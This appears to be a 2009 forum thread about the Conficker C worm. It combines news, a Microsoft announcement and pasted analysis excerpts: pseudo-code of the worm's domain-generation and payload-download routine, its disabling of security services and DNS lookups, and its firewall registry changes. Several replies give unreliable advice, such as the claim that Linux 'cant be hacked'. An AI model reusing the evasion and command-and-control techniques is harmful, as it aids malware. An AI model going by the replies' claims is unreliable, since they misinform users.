Heads up! Conficker worm!

[-The_King-]

Beware Conficker worm come April 1.

In an event that hits the computer world only once every few years, security experts are racing against time to mitigate the impact of a bit of malware which is set to wreak havoc on a hard-coded date. As is often the case, that date is April 1.

Malware creators love to target April Fool's Day with their wares, and the latest worm, called Conficker C, could be one of the most damaging attacks we've seen in years.

Conficker first bubbled up in late 2008 and began making headlines in January as known infections topped 9 million computers. Now in its third variant, Conficker C, the worm has grown incredibly complicated, powerful, and virulent... though no one is quite sure exactly what it will do when D-Day arrives.

Thanks in part to a quarter-million-dollar bounty on the head of the writer of the worm, offered by Microsoft, security researchers are aggressively digging into the worm's code as they attempt to engineer a cure or find the writer before the deadline. What's known so far is that on April 1, all infected computers will come under the control of a master machine located somewhere across the web, at which point anything's possible. Will the zombie machines become denial of service attack pawns, steal personal information, wipe hard drives, or simply manifest more traditional malware pop-ups and extortion-like come-ons designed to sell you phony security software? No one knows.

Conficker is clever in the way it hides its tracks because it uses an enormous number of URLs to communicate with HQ. The first version of Conficker used just 250 addresses each day -- which security researchers and ICANN simply bought and/or disabled -- but Conficker C will up the ante to 50,000 addresses a day when it goes active, a number which simply can't be tracked and disabled by hand.

At this point, you should be extra vigilant about protecting your PC: Patch Windows completely through Windows Update and update your anti-malware software as well. Make sure your antivirus software is actually running too, as Conficker may have disabled it.

Microsoft also offers a free online safety scan here, which should be able to detect all Conficker versions.

For the nerds: Conficker C Analysis | Technical Report

Conficker Activity Update

There’s been a lot of activity today around the Conficker worm here at Microsoft and across the industry. I wanted to give everyone a quick, high-level overview on what’s been going on today.

First, today we’re making public, the work we and many other industry and academic partners have been doing behind the scenes to help combat the Conficker worm.

Second, we’ve provided additional information from our research to our Microsoft Active Protections Program (MAPP) partners and our Microsoft Security Response Alliance (MSRA) partners and posted it to the MSRC weblog in an effort to help customers and other researchers.

Finally, we have announced a US$250,000 reward for information that results in the arrest and conviction of those responsible for illegally launching the Conficker worm. Individuals with information about the Conficker worm are encouraged to contact their international law enforcement agencies. Additionally, Microsoft has implemented an Antivirus Reward Hotline, 1-425-706-1111, and an Antivirus Reward Mailbox, avreward@microsoft.com, where tips can be shared.

The work that we’ve done with industry and academic partners and the additional information that we’ve provided all relate to the same thing: disrupting the Conficker worm’s attempts to connect to domains on the Internet after successfully attacking a system. By understanding the algorithm that the Conficker worm uses to generate the domain names that infected systems attempt to connect to, we can take steps to disrupt the Conficker worm by blocking access to those domains by infected systems.

We have worked with ICANN and operators within the domain name system to proactively disable a significant number of domains that systems infected by the Conficker worm would try to connect to.

We have also made information about the algorithm and the list of domain names available so that security researchers and customers can review logs to identify infected systems connecting to these domains and proactively block access to these domains.

As someone involved in security response for a number of years, it’s exciting for me to see the industry come together to take an innovative, new approach to combating malware. It helps prove again that while threats may be evolving, so too is our response as an industry to these threats.

Thanks.
Christopher

Updated 2/14/2009 with contact information regarding Antivirus Reward
*This posting is provided "AS IS" with no warranties, and confers no rights*

Yeah.
Try not to download anything from sites you're know that they're not 100% safety!

[Mobster]

so like qj is fine

[mwgplyr]

Just dont mess around with limewire or torrents (-aXXo-s fine just check hashes)... scan your pc and if you find the worm USE SOMETHING CALLED WARRENTY or INSURANCE DO NOT TRY TO GET RID OF THE WORM YOURSELF! if you dont have insurance get it before D-Day.

EDIT: it seems as tho from my understanding that the worm uses a a set of domains ( could b thousands...) and then splits to 50k IPs making it over 1 Mil+ possible IPs most of them (almost all but like 2k would b web-based dummy codes

int domain_name_generation()
{
// local declarations
hMem = 0;
check_if_MS_DEF_PROV();
get_time_from_popular_web_sites();
// baidu.com, google.com, yahoo.com, ask.com, w3.org,
// facebook.com, imageshack.us, rapidshare.com

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
{
while ( 1 )
{
counter_domains = counter;
if ( counter >= 50000 )
break;

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars
// append "." at the end of the name
random = DGA_random_function();
strcat(domainname, TLD-suffix[random num % 116] );
// append 1 of 116 suffixes (from 110 TLDs) to domain name
++counter;
}

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
{
// random number modulo 50,000
one_in_50000_names = conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
{
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
{
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
{
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
{
is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
{
found = 0;
index = 0;
while (index < counter_domains )
{
if (host_address == array_previously_checked_IPs[index] )
{
found = 1;
break; // break if IP has been previously encountered
}
++index;
}
// skip if IP has been previously encountered
if ( !found )
{
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
}
}
}
}
}
}
Sleep(...); // sleep small random amount
++counter_domains;
}
}
GlobalFree(hMem);
return success_download;
}

EDIT: It also disables detection by basically all virus scanners ... even other viruses

Domain Lookup Prevention

At each process initialization, Conficker C applies an in-memory patch to dnsapi.dll (Windows XP, 2K) or dnsrslvr.dll (Vista). It does not patch the DLL files on the filesystem, only their in-memory instances. These DLLs contain the standard Windows APIs for domain name resolution and caching. Conficker modifies Window's DNS lookup and cache services to prevent successful communications with various security product vendors and research sites. The list of blocked domain lookups is shown in Table 1.

Windows Security Service Disablement

Each time it starts, Conficker C spawns a thread to disable security services and terminate Conficker removal software. This thread is responsible for disabling Windows services that deliver security patches and software updates, effectively preventing the victim host from receiving automated software updates. For example, in addition to disabling Windows Defender and the Windows error reporting service, this logic disables BITS (Background Intelligent Transfer Service). The BITS service is used to prioritize, throttle, and control asynchronous file transfers between machines using idle network bandwidth. It is used by the Windows Update services and other software updaters to stay current with the latest patches and security hot fixes.

Figure 6 provides a pseudo-code summary of the security disablement thread. The main program logic is shown in function disable_security_services_and_terminate_conficker_ cleaners(). This function disables Windows Security Center Service (wscsvc), Windows Defender Service (WinDefend), Windows Automatic Update Service (wuauserv), BITS (Background Intelligent Transfer Service), Windows Error Reporting Service (ERSvc), and the Windows Error Reporting Service (WerSvc). It further deletes Windows Defender from the Run Registry Key, deactivates security center notifications (FD6905CE-952F-41F1-9A6F-135D9C6622CC), and deletes the safeboot security key. It then spawns the monitor_and_terminate_conficker_cleaners thread, discussed in Security Product Terminator Thread.

The disable_security_service pseudo-code is also show in Figure 6. This function Illustrates the actual logic used to disable the five security services. First, C opens the security manager with all access privileges. It then loops through the set of resident services, ignoring all services reported as kernel devices. If it finds a matching device name, it first shuts down the service, sleeps for 4 seconds, and then sets the service configuration to permanently disable the service.

Hell it even destroys your firewall:

Firewall Disablement
To interact with external clients during P2P communications, C disables the blocking of several high-order TCP and UDP application ports. This is done through HKLM modifications, where the opened ports are listed in the GloballyOpenPorts registry key. These ports are fixed per Conficker installation. The following is an example set of firewall modifications made during a Conficker C run:

SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 11930:TCP, New Value: 11930:TCP:*:Enabled:PackagesOffice MSDownloaded

SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 45436:TCP, New Value: 45436:TCP:*:Enabled:PackagesOffice SpeechGames

SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 48481:UDP, New Value: 48481:UDP:*:Enabled:PackagesOffice PagesPages

SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 57338:UDP, New Value: 57338:UDP:*:Enabled:PackagesOffice MediaDistribution

Listed with these firewall port disablement changes are apparent product package names, such as MSDownloaded, SpeechGames, MediaDistribution, and PagesPages. These package names are bogus, and appear to associate these security changes to software packages that appear benign.

Get ready for complete ownage...

[mrbob3]

I remember people getting worried on the 31st december 1999..........

[TR1X]

The obvious solution is a good can of worm repellent!

god those nerds never think of the common sense solutions :P

[Omega_redest]

Use Nod anti virus
Threat fire
and reg cure..

it cleared my pc from this a few weeks ago

As a defence combo, it has proved it self many times "only the best for my pc"

[NytFantom]

It seems kind of convenient to be on April 1st. I mean really. Someone must have some good time to kill to want to make a joke or something of this size. I don't think there's much else it could do to my old piece of junk though.

[-The_King-]

Probably all bullshit, and just an april fools day joke. Making every paranoid as hell.

You know that the Virus EXISTS!?
And maybe it's already on your computer.. if you got windows ^^

Well, we'll see what happens in 2 days..
I'm excited

[thecoo1est]

Well I keep everything that means something on another drive, so if I get the worm Ill format that motherfu*ker

[Kaikz]

all u do is get the ubuntu live cd and install inside windows and use that for a while, linux cant be hacked, u can access all of ur windows files and use them if u install wine

[TR1X]

Ubuntu users is safe

[Kaikz]

i alredy got a live cd

[TR1X]

I converted about a year ago now my laptops, desktops, and server all run ubuntu

[Omega_redest]

Conficker is real and f&%S you up completely

[Stgdemon]

Sounds like Y2K all over again, lol! (not saying it's not real, but I'm sure they'll get it fixed soon enough)